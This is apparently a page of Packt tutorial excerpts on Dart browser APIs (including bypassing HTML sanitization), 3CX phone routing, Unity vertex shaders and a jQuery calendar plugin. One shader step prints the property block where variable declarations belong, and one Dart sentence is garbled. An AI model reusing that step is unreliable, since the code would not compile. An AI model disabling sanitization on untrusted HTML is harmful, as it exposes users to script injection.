want to remove all control in some cases (perhaps you are dealing with known safe HTML and need to bypass sanitization for performance reasons), you can add the class NullTreeSanitizer to your code, which has no control at all and defines an object allHtml, as shown in step 4. Then, use setInnerHtml() with an optional named attribute treeSanitizer set to allHtml. Using a browser's local storage Local storage (also called the Web Storage API) is widely supported in modern browsers. It enables the application's data to be persisted locally (on the client side) as a map-like structure: a dictionary of key-value string pairs, in fact using JSON strings to store and retrieve data. It provides our application with an offline mode of functioning when the server is not available to store the data in a database. Local storage does not expire, but every application can only access its own data up to a certain limit depending on the browser. In addition, of course, different browsers can't access each other's stores. How to do it... Look at the following example, the local_storage.dart file: import 'dart:html';  Storage local = window.localStorage;  void main() { var job1 = new Job(1, "Web Developer", 6500, "Dart Unlimited") ; Perform the following steps to use the browser's local storage: Write to a local storage with the key Job:1 using the following code: local["Job:${job1.id}"] = job1.toJson; ButtonElement bel = querySelector('#readls'); bel.onClick.listen(readShowData); } A click on the button checks to see whether the key Job:1 can be found in the local storage, and, if so, reads the data in. This is then shown in the data <div>: readShowData(Event e) {    var key = 'Job:1';    if(local.containsKey(key)) { // read data from local storage:    String job = local[key];    querySelector('#data').appendText(job); } }   class Job { int id; String type; int salary; String company; Job(this.id, this.type, this.salary, this.company); String get toJson => '{ "type": "$type", "salary": "$salary", "company": "$company" } '; } The following screenshot depicts how data is stored in and retrieved from a local storage: How it works... You can store data with a certain key in the local storage from the Window class as follows using window.localStorage[key] = data; (both key and data are Strings). You can retrieve it with var data = window.localStorage[key];. In our code, we used the abbreviation Storage local = window.localStorage; because local is a map. You can check the existence of this piece of data in the local storage with containsKey(key); in Chrome (also in other browsers via Developer Tools). You can verify this by navigating to Extra | Tools | Resources | Local Storage (as shown in the previous screenshot), window.localStorage also has a length property; you can query whether it contains something with isEmpty, and you can loop through all stored values using the following code: for(var key in window.localStorage.keys) { String value = window.localStorage[key]; // more code } There's more... Local storage can be disabled (by user action, or via an installed plugin or extension), so we must alert the user when this needs to be enabled; we can do this by catching the exception that occurs in this case: try { window.localStorage[key] = data; } on Exception catch (ex) { window.alert("Data not stored: Local storage is disabled!"); } Local storage is a simple key-value store and does have good cross-browser coverage. However, it can only store strings and is a blocking (synchronous) API; this means that it can temporarily pause your web page from responding while it is doing its job storing or reading large amounts of data such as images. Moreover, it has a space limit of 5 MB (this varies with browsers); you can't detect when you are nearing this limit and you can't ask for more space. When the limit is reached, an error occurs so that the user can be informed. These properties make local storage only useful as a temporary data storage tool; this means that it is better than cookies, but not suited for a reliable, database kind of storage. Web storage also has another way of storing data called sessionStorage used in the same way, but this limits the persistence of the data to only the current browser session. So, data is lost when the browser is closed or another application is started in the same browser window. Using an application cache to work offline When, for some reason, our users don't have web access or the website is down for maintenance (or even broken), our web-based applications should also work offline. The browser cache is not robust enough to be able to do this, so HTML5 has given us the mechanism of ApplicationCache. This cache tells the browser which files should be made available offline. The effect is that the application loads and works correctly, even when the user is offline. The files to be held in the cache are specified in a manifest file, which has a .mf or .appcache extension. How to do it... Look at the appcache application; it has a manifest file called appcache.mf. The manifest file can be specified in every web page that has to be cached. This is done with the manifest attribute of the <html> tag: <html manifest="appcache.mf"> If a page has to be cached and doesn't have the manifest attribute, it must be specified in the CACHE section of the manifest file. The manifest file has the following (minimum) content: CACHE MANIFEST # 2012-09-28:v3  CACHE: Cached1.html appcache.css appcache.dart http://dart.googlecode.com/svn/branches/bleeding_edge/dart/client/dart.js  NETWORK: *  FALLBACK: / offline.html Run cached1.html. This displays the This page is cached, and works offline! text. Change the text to This page has been changed! and reload the browser. You don't see the changed text because the page is created from the application cache. When the manifest file is changed (change version v1 to v2), the cache becomes invalid and the new version of the page is loaded with the This page has been changed! text. The Dart script appcache.dart of the page should contain the following minimal code to access the cache: main() { new AppCache(window.applicationCache); }  class AppCache { ApplicationCache appCache;  AppCache(this.appCache) {    appCache.onUpdateReady.listen((e) => updateReady());    appCache.onError.listen(onCacheError); }  void updateReady() {    if (appCache.status == ApplicationCache.UPDATEREADY) {      // The browser downloaded a new app cache. Alert the user:      appCache.swapCache();      window.alert('A new version of this site is available. Please reload.');    } }  void onCacheError(Event e) {      print('Cache error: ${e}');      // Implement more complete error reporting to developers } } How it works... The CACHE section in the manifest file enumerates all the entries that have to be cached. The NETWORK: and * options mean that to use all other resources the user has to be online. FALLBACK specifies that offline.html will be displayed if the user is offline and a resource is inaccessible. A page is cached when either of the following is true: Its HTML tag has a manifest attribute pointing to the manifest file The page is specified in the CACHE section of the manifest file The browser is notified when the manifest file is changed, and the user will be forced to refresh its cached resources. Adding a timestamp and/or a version number such as # 2014-05-18:v1 works fine. Changing the date or the version invalidates the cache, and the updated pages are again loaded from the server. To access the browser's app cache from your code, use the window.applicationCache object. Make an object of a class AppCache, and alert the user when the application cache has become invalid (the status is UPDATEREADY) by defining an onUpdateReady listener. There's more... The other known states of the application cache are UNCACHED, IDLE, CHECKING, DOWNLOADING, and OBSOLETE. To log all these cache events, you could add the following listeners to the appCache constructor: appCache.onCached.listen(onCacheEvent); appCache.onChecking.listen(onCacheEvent); appCache.onDownloading.listen(onCacheEvent); appCache.onNoUpdate.listen(onCacheEvent); appCache.onObsolete.listen(onCacheEvent); appCache.onProgress.listen(onCacheEvent); Provide an onCacheEvent handler using the following code: void onCacheEvent(Event e) {    print('Cache event: ${e}'); } Preventing an onSubmit event from reloading the page The default action for a submit button on a web page that contains an HTML form is to post all the form data to the server on which the application runs. What if we don't want this to happen? How to do it... Experiment with the submit application by performing the following steps: Our web page submit.html contains the following code: <form id="form1" action="http://www.dartlang.org" method="POST"> <label>Job:<input type="text" name="Job" size="75"></input>    </label>    <input type="submit" value="Job Search">    </form> Comment out all the code in submit.dart. Run the app, enter a job name, and click on the Job Search submit button; the Dart site appears. When the following code is added to submit.dart, clicking on the no button for a longer duration makes the Dart site appear: import 'dart:html';  void main() { querySelector('#form1').onSubmit.listen(submit); }  submit(Event e) {      e.preventDefault(); // code to be executed when button is clicked  } How it works... In the first step, when the submit button is pressed, the browser sees that the method is POST. This method collects the data and names from the input fields and sends it to the URL specified in action to be executed, which only shows the Dart site in our case. To prevent the form from posting the data, make an event handler for the onSubmit event of the form. In this handler code, e.preventDefault(); as the first statement will cancel the default submit action. However, the rest of the submit event handler (and even the same handler of a parent control, should there be one) is still executed on the client side. Summary In this article we learned how to handle web applications, sanitize a HTML, use a browser's local storage, use application cache to work offline, and how to prevent an onSubmit event from reloading a page. Resources for Article: Further resources on this subject: Handling the DOM in Dart [Article] QR Codes, Geolocation, Google Maps API, and HTML5 Video [Article] HTML5 Game Development – A Ball-shooting Machine with Physics Engine [Article]
Read more
  • 0
  • 0
  • 5963

article-image-call-control-using-3cx
Packt
11 Feb 2010
9 min read
Save for later

Call Control using 3CX

Packt
11 Feb 2010
9 min read
Let's get started! Ring groups Ring groups are designed to direct calls to a group of extensions so that a person can answer the call. An incoming call will ring at several extensions at once, and the one who picks up the phone gets control of that call. At that point, he/she can transfer the call, send it to voicemail, or hang up. Ring groups are my preferred call routing method. Does anyone really like those automated greetings? I don't. We will of course, set those up because they do have some great uses. However, if you like your customers to get a real live voice when they call, you have two choices—either direct the call to an extension or use a ring group and have a few phones ring at once. To create a ring group, we will use the 3CX web interface. There are several ways to do this. From the top toolbar menu, click Add | Ring Group. In the following screenshot, I chose Add | Ring Group: The following screenshot shows another way of adding a ring group using the Ring Groups section in the navigation pane on the left-hand side. Then click on the Add Ring Group button on the toolbar: Once we click Add Ring Group, 3CX will automatically create a Virtual machine number for this ring group as shown in the next screenshot. This helps the system keep track of calls and where they are. This number can be changed to any unused number that you like. As a reseller, I like to keep them the same from client to client. This creates some standardization among all the systems. Now it's time to give the ring group a Name. Here I use MainRingGroup as it lets me know that when a call comes in, it should go to the Main Ring Group. After you create the first one, you can make more such as SalesRingGroup, SupportRingGroup, and so on. We now have three choices for the Ring Strategy: Prioritized Hunt: Starts hunting for a member from the top of the Ring Group Members list and works down until someone picks up the phone or goes to the Destination if no answer section. Ring All: If all the phones in the Ring Group Members section ring at the same time then the first person to pick up gets the call. Paging: This is a paid feature that will open the speakerphone on Ring Group Members. Now you will need to select your Ring Time (Seconds) to determine how long you want the phones to ring before giving up. The default ring time is 20 seconds, which all my clients agree is too long. I'd recommend 10-15 seconds, but remember, if no one picks up the phone, then the caller goes to the next step, such as a Digital Receptionist. If the next step also makes the caller wait another 10-20 seconds, he/she may just hang up. You also need to be sure that you do not exceed the phone company's timeout of diverting calls to their voicemail (which could be turned off) or returning a busy signal. Adding ring group members Ring Group Members are the extensions that you would like the system to call or page in a ring group. If you select the Prioritized Hunt strategy, it will hunt from the top and go down the list. Ring All and Paging will get everyone at once. The listbox on the left will show you a list of available extensions. Select the ones you want and click the Add button. If you are using Prioritized Hunt, you can change the order of the hunt by using the Up and Down buttons. Destination if no answer The last setting as shown in the next screenshot illustrates what to do when no one answers the call. The options are as follows: End Call: Just drop the call, no chance for the caller to talk to someone. Connect to Extension: Ring the extension of your choice. Connect to Queue / Ring Group: This sends the caller to a call queue (discussed later in the Call queues section)) or to another ring group. A second ring group could be created for stage two that calls the same group plus additional extensions. Connect to Digital Receptionist: As a person didn't pick up the call, we can now send it to an automated greeting/menu system. Voicemail box for Extension: As the caller has already heard phones ringing, you may just want to put him/her straight to someone's voicemail. Forward to Outside Number: If you have had all the phones in the building ringing and no one has picked up, then you might want to send the caller to a different phone outside of your PBX system. Just make sure that you enter the correct phone number and any area codes that may be required. This will use another simultaneous call license and another phone line. If you have one line only, then this is not the option you can use. Digital Receptionist setup A Digital Receptionist (DR) is not a voicemail box; it's an automated greeting with a menu of choices to choose from. A DR will answer the phone for you if no one is available to answer the phone (directly to an extension or hunt group) or if it is after office hours. You need to set up a DR unless you want all incoming calls to go to someone's voicemail. You will also need it if you want to present the caller with a menu of options. Let's see how to create a DR. Recording a menu prompt The first thing you need to do in order to create a DR is record a greeting. There are a couple of ways to do this. However, first let's create the greeting script. In this greeting, you will be defining your phone menu; that is, you will be directing calls to extensions, hunts, agent groups, and the dial by name directory. Following is an example: Thank you for calling. If you know your party's extension, you may dial it at any time. Or else, please listen to the following options: For Rob, dial 1 For the sales group, dial 2 For Zachary, dial 4 Solicitors, please dial 8 For a dial by name directory, dial 9 I suggest having it written down. This makes it easier to record and also gives the person setting up the DR in 3CX a copy of the menu map. Now that you know what you want your callers to hear when they call, it's time to get it recorded so that we can import it into 3CX. You have a couple of options for recording the greeting script. It doesn't matter which option you use or how you obtain this greeting file, as long as the end format is correct. You can hire a professional announcer, put it to music, and obtain the file from him/her. You can record it using any audio software you like such as Windows Sound Recorder, or any audio recording software. The file needs to be a .wav or an .mp3 file saved in PCM, 8KHz, 16 bit, Mono format. If you have Windows Sound Recorder only, I'd suggest that you try out Audacity. Audacity is an open source audio file program available at http://audacity.sourceforge.net/. Audacity gives you a lot more power such as controlling volume, combining several audio tracks (a music track to go with the announcer), using special effects, and many other cool audio tools. I'm not an expert in it but the basics are easy to do. First, hit the Audacity website and download it, then install it using the defaults. Now let's launch Audacity and set it up to use the correct file format, which will save us any issues later. Start by clicking Edit | Preferences. On the Quality tab, select the Default Sample Rate as 8000 Hz. Then change the Default Sample Format to 16-bit as shown in the following screenshot: Now, on the File Formats tab, select WAV (Microsoft 16 bit PCM) from the drop-down list and click OK: Now that those settings are saved, you can record your greeting without having to change any formats. Now it's time to record your greeting. Click on the red Record button as shown in the following screenshot. It will now use your PC's microphone to record the announcer's voice and when the recording is done, click on the Stop button. Press Play to hear it, and if you don't like it, start over again: If you like the way your greeting sounds, then you will need to save it. Click File | Export As WAV... or Export As MP3.... Save it to a location that you remember (for example, c:3CX prompts is a good place) with a descriptive filename. While you are recording this greeting, you might as well record a few more if you have plans for creating multiple DRs: Creating the Digital Receptionist With your greeting script in hand, it's time to create your first DR. In the navigation pane on the left side, click Digital Receptionist, then click Add Digital Receptionist as shown in the following screenshot: Or on the top menu toolbar, click Add | Digital Receptionist: Just like your ring group, the DR gets a Virtual extension number by default, Feel free to change it or stick with it. Give it a Name, (I like to use the same name as the audio greeting filename.) Now, click Browse... and then Add. Browse to your c:3CX prompts directory and select your .wav or .mp3 file as shown in the following screenshot: Next, we need to create the menu system as shown in the following screenshot. We have lots of options available. You can connect to an extension or ring group, transfer directly to someone's voicemail, end the call (my solicitors' option), or start the call by name feature (discussed in the Call by name setup section). At any time during playback, callers can dial the extension number; they don't have to hear all the options. I usually explain this in the DR recorded greeting.
Read more
  • 0
  • 0
  • 5962

article-image-vertex-functions
Packt
01 Feb 2016
18 min read
Save for later

The Vertex Functions

Packt
01 Feb 2016
18 min read
In this article by Alan Zucconi, author of the book Unity 5.x Shaders and Effects Cookbook, we will see that the term shader originates from the fact that Cg has been mainly used to simulate realistic lighting conditions (shadows) on three-dimensional models. Despite this, shaders are now much more than that. They not only define the way objects are going to look, but also redefine their shapes entirely. If you want to learn how to manipulate the geometry of a three-dimensional object only via shaders, this article is for you. In this article, you will learn the following: Extruding your models Implementing a snow shader Implementing a volumetric explosion (For more resources related to this topic, see here.) In this article, we will explain that 3D models are not just a collection of triangles. Each vertex can contain data, which is essential for correctly rendering the model itself. This article will explore how to access this information in order to use it in a shader. We will also explore how the geometry of an object can be deformed simply using Cg code. Extruding your models One of the biggest problems in games is repetition. Creating new content is a time-consuming task and when you have to face a thousand enemies, the chances are that they will all look the same. A relatively cheap technique to add variations to your models is using a shader that alters its basic geometry. This recipe will show a technique called normal extrusion, which can be used to create a chubbier or skinnier version of a model, as shown in the following image with the soldier from the Unity camp (Demo Gameplay): Getting ready For this recipe, we need to have access to the shader used by the model that you want to alter. Once you have it, we will duplicate it so that we can edit it safely. It can be done as follows: Find the shader that your model is using and, once selected, duplicate it by pressing Ctrl+D. Duplicate the original material of the model and assign the cloned shader to it. Assign the new material to your model and start editing it. For this effect to work, your model should have normals. How to do it… To create this effect, start by modifying the duplicated shader as shown in the following: Let's start by adding a property to our shader, which will be used to modulate its extrusion. The range that is presented here goes from -1 to +1;however, you might have to adjust that according to your own needs, as follows: _Amount ("Extrusion Amount", Range(-1,+1)) = 0 Couple the property with its respective variable, as shown in the following: float _Amount; Change the pragma directive so that it now uses a vertex modifier. You can do this by adding vertex:function_name at the end of it. In our case, we have called the vertfunction, as follows: #pragma surface surf Lambert vertex:vert Add the following vertex modifier: void vert (inout appdata_full v) { v.vertex.xyz += v.normal * _Amount; } The shader is now ready; you can use the Extrusion Amount slider in the Inspectormaterial to make your model skinnier or chubbier. How it works… Surface shaders works in two steps: the surface function and the vertex modifier. It takes the data structure of a vertex (which is usually called appdata_full) and applies a transformation to it. This gives us the freedom to virtually do everything with the geometry of our model. We signal the graphics processing unit(GPU) that such a function exists by adding vertex:vert to the pragma directive of the surface shader. One of the most simple yet effective techniques that can be used to alter the geometry of a model is called normal extrusion. It works by projecting a vertex along its normal direction. This is done by the following line of code: v.vertex.xyz += v.normal * _Amount; The position of a vertex is displaced by the_Amount units toward the vertex normal. If _Amount gets too high, the results can be quite unpleasant. However, you can add lot of variations to your modelswith smaller values. There's more… If you have multiple enemies and you want each one to have theirown weight, you have to create a different material for each one of them. This is necessary as thematerials are normally shared between models and changing one will change all of them. There are several ways in which you can do this; the quickest one is to create a script that automatically does it for you. The following script, once attached to an object with Renderer, will duplicate its first material and set the _Amount property automatically, as follows: using UnityEngine; publicclassNormalExtruder : MonoBehaviour { [Range(-0.0001f, 0.0001f)] publicfloat amount = 0; // Use this for initialization void Start () { Material material = GetComponent<Renderer>().sharedMaterial; Material newMaterial = new Material(material); newMaterial.SetFloat("_Amount", amount); GetComponent<Renderer>().material = newMaterial; } } Adding extrusion maps This technique can actually be improved even further. We can add an extra texture (or using the alpha channel of the main one) to indicate the amount of the extrusion. This allows a better control over which parts are raised or lowered. The following code shows how it is possible to achieve such an effect: sampler2D _ExtrusionTex; void vert(inout appdata_full v) { float4 tex = tex2Dlod (_ExtrusionTex, float4(v.texcoord.xy,0,0)); float extrusion = tex.r * 2 - 1; v.vertex.xyz += v.normal * _Amount * extrusion; } The red channel of _ExtrusionTex is used as a multiplying coefficient for normal extrusion. A value of 0.5 leaves the model unaffected; darker or lighter shades are used to extrude vertices inward or outward, respectively. You should notice that to sample a texture in a vertex modifier, tex2Dlod should be used instead of tex2D. In shaders, colour channels go from 0 to 1.Although, sometimes, you need to represent negative values as well (such as inward extrusion). When this is the case, treat 0.5 as zero; having smaller values as negative and higher values as positive. This is exactly what happens with normals, which are usually encoded in RGB textures. The UnpackNormal()function is used to map a value in the (0,1) range on the (-1,+1)range. Mathematically speaking, this is equivalent to tex.r * 2 -1. Extrusion maps are perfect to zombify characters by shrinking the skin in order to highlight the shape of the bones underneath. The following image shows how a "healthy" soldier can be transformed into a corpse using a shader and an extrusion map. Compared to the previous example, you can notice how the clothing is unaffected. The shader used in the following image also darkens the extruded regions in order to give an even more emaciated look to the soldier:   Implementing a snow shader The simulation of snow has always been a challenge in games. The vast majority of games simply baked snow directly in the models textures so that their tops look white. However, what if one of these objects starts rotating? Snow is not just a lick of paint on a surface; it is a proper accumulation of material and it should be treated as so. This recipe will show how to give a snowy look to your models using just a shader. This effect is achieved in two steps. First, a white colour is used for all the triangles facing the sky. Second, their vertices are extruded to simulate the effect of snow accumulation. You can see the result in the following image:   Keep in mind that this recipe does not aim to create photorealistic snow effect. It provides a good starting point;however, it is up to an artist to create the right textures and find the right parameters to make it fit your game. Getting ready This effect is purely based on shaders. We will need to do the following: Create a new shader for the snow effect. Create a new material for the shader. Assign the newly created material to the object that you want to be snowy. How to do it… To create a snowy effect, open your shader and make the following changes: Replace the properties of the shader with the following ones: _MainColor("Main Color", Color) = (1.0,1.0,1.0,1.0) _MainTex("Base (RGB)", 2D) = "white" {} _Bump("Bump", 2D) = "bump" {} _Snow("Level of snow", Range(1, -1)) = 1 _SnowColor("Color of snow", Color) = (1.0,1.0,1.0,1.0) _SnowDirection("Direction of snow", Vector) = (0,1,0) _SnowDepth("Depth of snow", Range(0,1)) = 0 Complete them with their relative variables, as follows: sampler2D _MainTex; sampler2D _Bump; float _Snow; float4 _SnowColor; float4 _MainColor; float4 _SnowDirection; float _SnowDepth; Replace the Input structure with the following: struct Input { float2 uv_MainTex; float2 uv_Bump; float3 worldNormal; INTERNAL_DATA }; Replace the surface function with the following one. It will color the snowy parts of the model white: void surf(Input IN, inout SurfaceOutputStandard o) { half4 c = tex2D(_MainTex, IN.uv_MainTex); o.Normal = UnpackNormal(tex2D(_Bump, IN.uv_Bump)); if (dot(WorldNormalVector(IN, o.Normal), _SnowDirection.xyz) >= _Snow) o.Albedo = _SnowColor.rgb; else o.Albedo = c.rgb * _MainColor; o.Alpha = 1; } Configure the pragma directive so that it uses a vertex modifiers, as follows: #pragma surface surf Standard vertex:vert Add the following vertex modifiers that extrudes the vertices covered in snow, as follows: void vert(inout appdata_full v) { float4 sn = mul(UNITY_MATRIX_IT_MV, _SnowDirection); if (dot(v.normal, sn.xyz) >= _Snow) v.vertex.xyz += (sn.xyz + v.normal) * _SnowDepth * _Snow; } You can now use the Inspectormaterial to select how much of your mode is going to be covered and how thick the snow should be. How it works… This shader works in two steps. Coloring the surface The first one alters the color of the triangles thatare facing the sky. It affects all the triangles with a normal direction similar to _SnowDirection. Comparing unit vectors can be done using the dot product. When two vectors are orthogonal, their dot product is zero; it is one (or minus one) when they are parallel to each other. The _Snowproperty is used to decide how aligned they should be in order to be considered facing the sky. If you look closely at the surface function, you can see that we are not directly dotting the normal and the snow direction. This is because they are usually defined in a different space. The snow direction is expressed in world coordinates, while the object normals are usually relative to the model itself. If we rotate the model, its normals will not change, which is not what we want. To fix this, we need to convert the normals from their object coordinates to world coordinates. This is done with the WorldNormalVector()function, as follows: if (dot(WorldNormalVector(IN, o.Normal), _SnowDirection.xyz) >= _Snow) o.Albedo = _SnowColor.rgb; else o.Albedo = c.rgb * _MainColor; This shader simply colors the model white; a more advanced one should initialize the SurfaceOutputStandard structure with textures and parameters from a realistic snow material. Altering the geometry The second effect of this shader alters the geometry to simulate the accumulation of snow. Firstly, we identify the triangles that have been coloured white by testing the same condition used in the surface function. This time, unfortunately, we cannot rely on WorldNormalVector()asthe SurfaceOutputStandard structure is not yet initialized in the vertex modifier. We will use this other method instead, which converts _SnowDirection in objectcoordinates, as follows: float4 sn = mul(UNITY_MATRIX_IT_MV, _SnowDirection); Then, we can extrude the geometry to simulate the accumulation of snow, as shown in the following: if (dot(v.normal, sn.xyz) >= _Snow) v.vertex.xyz += (sn.xyz + v.normal) * _SnowDepth * _Snow; Once again, this is a very basic effect. One could use a texture map to control the accumulation of snow more precisely or to give it a peculiar, uneven look. See also If you need high quality snow effects and props for your game, you can also check the following resources in the Asset Storeof Unity: Winter Suite ($30): A much more sophisticated version of the snow shader presented in this recipe can be found at: https://www.assetstore.unity3d.com/en/#!/content/13927 Winter Pack ($60): A very realistic set of props and materials for snowy environments are found at: https://www.assetstore.unity3d.com/en/#!/content/13316 Implementing a volumetric explosion The art of game development is a clever trade-off between realism and efficiency. This is particularly true for explosions; they are at the heart of many games, yet the physics behind them is often beyond the computational power of modern machines. Explosions are essentially nothing more than hot balls of gas; hence, the only way to correctly simulate them is by integrating a fluid simulation in your game. As you can imagine, this is infeasible for runtime applications and many games simply simulate them with particles. When an object explodes, it is common to simply instantiate many fire, smoke, and debris particles that can have believableresulttogether. This approach, unfortunately, is not very realistic and is easy to spot. There is an intermediate technique that can be used to achieve a much more realistic effect: the volumetric explosions. The idea behind this concept is that the explosions are not treated like a bunch of particlesanymore; they are evolving three-dimensional objects and not just flat two-dimensionaltextures. Getting ready Start this recipe with the following steps: Create a new shader for this effect. Create a new material to host the shader. Attach the material to a sphere. You can create one directly from the editor bynavigating to GameObject | 3D Object | Sphere. This recipe works well with the standard Unity Sphere;however, if you need big explosions, you might need to use a more high-poly sphere. In fact, a vertex function can only modify the vertices of a mesh. All the other points will be interpolated using the positions of the nearby vertices. Fewer vertices mean lower resolution for your explosions. For this recipe, you will also need a ramp texture that has, in a gradient, all the colors that your explosions will have. You can create the following texture using GIMP or Photoshop. The following is the one used for this recipe: Once you have the picture, import it to Unity. Then, from its Inspector, make sure the Filter Mode is set to Bilinear and the Wrap Mode to Clamp. These two settings make sure that the ramp texture is sampled smoothly. Lastly, you will need a noisy texture. You can find many of them on the Internet as freely available noise textures. The most commonly used ones are generated using Perlin noise. How to do it… This effect works in two steps: a vertex function to change the geometry and a surface function to give it the right color. The steps are as follows: Add the following properties for the shader: _RampTex("Color Ramp", 2D) = "white" {} _RampOffset("Ramp offset", Range(-0.5,0.5))= 0 _NoiseTex("Noise tex", 2D) = "gray" {} _Period("Period", Range(0,1)) = 0.5 _Amount("_Amount", Range(0, 1.0)) = 0.1 _ClipRange("ClipRange", Range(0,1)) = 1 Add their relative variables so that the Cg code of the shader can actually access them, as follows: _RampTex("Color Ramp", 2D) = "white" {} _RampOffset("Ramp offset", Range(-0.5,0.5))= 0 _NoiseTex("Noise tex", 2D) = "gray" {} _Period("Period", Range(0,1)) = 0.5 _Amount("_Amount", Range(0, 1.0)) = 0.1 _ClipRange("ClipRange", Range(0,1)) = 1 Change the Input structure so that it receives the UV data of the ramp texture, as shown in the following: struct Input { float2 uv_NoiseTex; }; Add the following vertex function: void vert(inout appdata_full v) { float3 disp = tex2Dlod(_NoiseTex, float4(v.texcoord.xy,0,0)); float time = sin(_Time[3] *_Period + disp.r*10); v.vertex.xyz += v.normal * disp.r * _Amount * time; } Add the following surface function: void surf(Input IN, inout SurfaceOutput o) { float3 noise = tex2D(_NoiseTex, IN.uv_NoiseTex); float n = saturate(noise.r + _RampOffset); clip(_ClipRange - n); half4 c = tex2D(_RampTex, float2(n,0.5)); o.Albedo = c.rgb; o.Emission = c.rgb*c.a; } We will specify the vertex function in the pragma directive, adding the nolightmapparameter to prevent Unity from adding realistic lightings to our explosion, as follows: #pragma surface surf Lambert vertex:vert nolightmap The last step is to select the material and attaching the two textures in the relative slotsfrom its inspector. This is an animated material, meaning that it evolves over time. You can watch the material changing in the editor by clicking on Animated Materials from the Scene window: How it works If you are reading this recipe, you are already familiar with how surface shaders and vertex modifiers work. The main idea behind this effect is to alter the geometry of the sphere in a seemingly chaotic way, exactly like it happens in a real explosion. The following image shows how such explosion will look in the editor. You can see that the original mesh has been heavily deformed in the following image: The vertex function is a variant of the technique called normal extrusion. The difference here is that the amount of the extrusion is determined by both the time and the noise texture. When you need a random number in Unity, you can rely on the Random.Range()function. There is no standard way to get random numbers within a shader, therefore,the easiest way is to sample a noise texture. There is no standard way to do this, therefore, take the following only as an example: float time = sin(_Time[3] *_Period + disp.r*10); The built-in _Time[3]variable is used to get the current time from the shader and the red channel of the disp.rnoise texture is used to make sure that each vertex moves independently. The sin()function makes the vertices go up and down, simulating the chaotic behavior of an explosion. Then, the normal extrusion takes place as shown in the following: v.vertex.xyz += v.normal * disp.r * _Amount * time; You should play with these numbers and variables until you find a pattern of movement that you are happy with. The last part of the effect is achieved by the surface function. Here, the noise texture is used to sample a random color from the ramp texture. However, there are two more aspects that are worth noticing. The first one is the introduction of _RampOffset. Its usage forces the explosion to sample colors from the left or right side of the texture. With positive values, the surface of the explosion tends to show more grey tones— which is exactly what happens when it is dissolving. You can use _RampOffset to determine how much fire or smoke should be there in your explosion. The second aspect introduced in the surface function is the use of clip(). Theclip()function clips (removes) pixels from the rendering pipeline. When invoked with a negative value, the current pixel is not drawn. This effect is controlled by _ClipRange, which determines the pixels of the volumetric explosions that are going to be transparent. By controlling both _RampOffset and _ClipRange, you have full control to determine how the explosion behaves and dissolves. There's more… The shader presented in this recipe makes a sphere look like an explosion. If you really want to use it, you should couple it with some scripts in order to get the most out of it. The best thing to do is to create an explosion object and turn it to a prefab so that you can reuse it every time you need. You can do this by dragging the sphere back in the Project window. Once it is done, you can create as many explosions as you want using the Instantiate() function. However,it is worth noticing that all the objects with the same material share the same look. If you have multiple explosions at the same time, they should not use the same material. When you are instantiating a new explosion, you should also duplicate its material. You can do this easily with the following piece of code: GameObject explosion = Instantiate(explosionPrefab) as GameObject; Renderer renderer = explosion.GetComponent<Renderer>(); Material material = new Material(renderer.sharedMaterial); renderer.material = material; Lastly, if you are going to use this shader in a realistic way, you should attach a script to it, which changes its size—_RampOffsetor_ClipRange—accordingly to the type of explosion you want to recreate. See also A lot more can be done to make explosions realistic. The approach presented in this recipe only creates an empty shell; the explosion in it is actually empty. An easy trick to improve it is to create particles in it. However, you can only go so far with this. The short movie,The Butterfly Effect (http://unity3d.com/pages/butterfly), created by Unity Technologies in collaboration with Passion Pictures and Nvidia, is the perfect example. It is based on the same concept of altering the geometry of a sphere;however, it renders it with a technique called volume ray casting. In a nutshell, it renders the geometry as if it's complete. You can see the following image as an example:   If you are looking for high quality explosions, refer toPyro Technix (https://www.assetstore.unity3d.com/en/#!/content/16925) on the Asset Store. It includes volumetric explosions and couples them with realistic shockwaves. Summary In this article, we saw the recipes to extrude models and implement a snow shader and volumetric explosion. Resources for Article: Further resources on this subject: Lights and Effects [article] Looking Back, Looking Forward [article] Animation features in Unity 5 [article]
Read more
  • 0
  • 0
  • 5956
article-image-calendars-jquery-13-php-using-jquery-week-calendar-plugin-part-1
Packt
19 Nov 2009
7 min read
Save for later

Calendars in jQuery 1.3 with PHP using jQuery Week Calendar Plugin: Part 1

Packt
19 Nov 2009
7 min read
There are many reasons why you would want to display a calendar. You can use it to display upcoming events, to keep a diary, or to show a timetable. Recently, for example, I combined a calendar with an online store for a client to book meetings and receive payments more intuitively. Google calendar is probably what springs to mind when people think of calendars online. There is a very good plugin called jquery-week-calendar that shows a week with events in a fashion similar to Google's calendar. Its homepage is at http://www.redredred.com.au/projects/jquery-week-calendar/. To get the latest copy of the plugin, go to http://code.google.com/p/jquery-week-calendar/downloads/list and get the highest-numbered file. The examples in this article are done with version 1.2.0. Download the library and extract it so that there is a directory named jquery-weekcalendar-1.2.0 in the root of your demo directory. Displaying the calendar As usual, the HTML for the simplest configuration is very simple. Save this as calendar.html: <html> <head> <script src="../jquery.min.js"></script> <script src="../jquery-ui.min.js"></script> <script src="../jquery-weekcalendar-1.2.0/jquery.weekcalendar.js"> </script> <script src="calendar.js"></script> <link rel="stylesheet" type="text/css" href="../jquery-ui.css" /> <link rel="stylesheet" type="text/css" href="../jquery-weekcalendar-1.2.0/jquery.weekcalendar.css"/> </head> <body> <div id="calendar_wrapper" style="height:500px"></div> </body> </html> We will keep all of our JavaScript in an external file called calendar.js, which will initially contain just this: $(document).ready(function() { $('#calendar_wrapper').weekCalendar({ 'height':function($calendar){ return $('#calendar_wrapper')[0].offsetHeight; } }); }); This is fairly straightforward. The script will apply the widget to the #calendar_wrapper element, and the widget's height will be set to that of the wrapper element. Even with this tiny bit of code, we already have a good-looking calendar, and when you drag your mouse cursor around it, you'll see that events are created as you lift the mouse up: It looks good, but it doesn't do anything yet. The events are temporary, and will vanish as soon as you change the week or reload the page. In order to make them permanent, we need to send details of the events to the server and save them there. Creating an event What we need to do is to have the client save the event on the server when it is created. In this article, we'll use PHP sessions to save the data for the sake of simplicity. Sessions are chunks of data, which are kept on the server side and are related to the cookie or PHPSESSID parameter that the client uses to access that session. We will use sessions in these examples because they do not need as much setup as databases. For your own projects, you should adapt the PHP side in order to connect to a database instead. If you are using this article to create a full application, you will obviously want to use something more permanent than sessions, in which case the PHP code should be adapted such that all references to sessions are replaced with database references instead. This is beyond the scope of this book, but as you are a PHP developer, you probably do this everyday anyway! When the event has been created, we want a modal dialog to appear and ask for more details. In this test case, we'll add a text area for further details, which allows for more data than would appear in the small visible area in the calendar itself. A modal dialog is a "pop up" that appears and blocks all other actions on the page until it has been taken care of. It's useful in cases where the answer to a question must be known before a script can carry on with its work. Now, let's create an event and add it to our calendar. Client-side code In the calendar.js file, add an eventNew event to 